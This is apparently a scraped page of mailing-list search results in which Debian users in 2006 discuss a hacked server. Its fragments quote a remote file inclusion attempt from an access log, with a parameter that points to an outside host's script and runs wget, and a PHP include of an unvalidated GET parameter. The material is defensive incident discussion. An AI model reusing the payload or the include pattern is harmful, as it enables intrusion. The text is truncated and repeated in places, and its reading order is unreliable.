On Mon, Nov 06, 2006 at 11:19:20AM +0100, Heilig Szabolcs wrote:
> Hello!
>
> >http://jesusch.de/~jesusch/tmp/access.log
>
> There are many log entries with "something=http://"; style
> pattern. These are common attack methods against default configured
> servers with poorly written applications.
On Mon, Nov 06, 2006 at 06:21:26PM +0100, Fuzzums wrote:
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
> http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
> HTTP/1.0" 403 495
> "http://85.214.18.193
Hi Fuzzums,
Fuzzums schrieb:
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
HTTP/1.0" 403 495
"http://85.214.18.193/manager/media/browser/mcpuk/conne
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
HTTP/1.0" 403 495
"http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.p
Hi,
> at that mentioned time someone at least tried to access pages which are
> not accessable (index.php?img=1 e.g.)
>
> ther definately might be a problem in the code:
>
> if ( $_GET['page'] ) {
> include $_GET['page'].'/index.php';
> }
>
>
> could this be the vulnerable code segment?
Hello!
http://jesusch.de/~jesusch/tmp/access.log
There are many log entries with "something=http://"; style
pattern. These are common attack methods against default configured
servers with poorly written applications. Many of these rely on
register_globals=on php.ini setting. Turn it off first
I've putted access.log online with the following cutted off:
grep -v "Googlebot/2.1" access.log.1| grep -v ^87.106.31.224|grep -v
gallery|grep -v "Yahoo! Slurp"|grep -vi svn |grep -v mediawiki |grep -v
"favicon.ico"
http://jesusch.de/~jesusch/tmp/access.log
at that mentioned time someone at l
On Sun, Nov 05, 2006 at 08:27:36PM -0800, John Bugg wrote:
> Please register my name for update/upgrade notifications. Thanks in advance.
You can do this from
http://lists.debian.org/debian-security-announce/
Regards,
Dominic.
--
Dominic Hargreaves | http://www.larted.org.uk/~dom/
PGP key 5178
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
As I'm not so aware could someone be so kind to help me with a forensic
analysis? I also still do not know which program (propably any php-stuff)
was/is vulnerable.
All I've found so far where these entries in my apache2 error-log.
http://jesusch
Hi list,
My sarge box box was recently hacked by some script kiddy who installed
an irc-dcc-filserver on it :/
As I'm not so aware could someone be so kind to help me with a forensic
analysis? I also still do not know which program (propably any
php-stuff) was/is vulnerable.
All I've found so
10 matches
Mail list logo
